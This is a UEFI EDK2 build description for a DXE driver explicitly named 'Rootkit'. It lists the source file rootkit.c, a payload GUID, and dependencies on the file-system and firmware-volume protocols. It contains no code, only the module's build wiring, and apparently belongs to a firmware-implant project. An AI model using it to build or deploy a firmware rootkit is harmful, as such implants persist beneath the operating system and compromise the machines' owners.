[Defines]
  INF_VERSION                    = 0x00010005
  BASE_NAME                      = Rootkit
  FILE_GUID                      = F7DB0ECE-2847-4C84-9B12-2A11A0CC530C # generated
  MODULE_TYPE                    = DXE_DRIVER
  VERSION_STRING                 = 1.0
  ENTRY_POINT                    = RootkitEntryPoint

[Sources]
  rootkit.c

[Packages]
  MdePkg/MdePkg.dec
  MdeModulePkg/MdeModulePkg.dec
  DxeRootkitPkg/DxeRootkitPkg.dec

[LibraryClasses]
  UefiDriverEntryPoint
  UefiLib
  UefiBootServicesTableLib
  BaseMemoryLib
  BaseLib

[Guids]
  gEfiPayloadGuid

[Protocols]
  gEfiSimpleFileSystemProtocolGuid  # consumes
  gEfiFirmwareVolume2ProtocolGuid   # consumes

[Depex]
  gEfiSimpleFileSystemProtocolGuid AND
  gEfiFirmwareVolume2ProtocolGuid
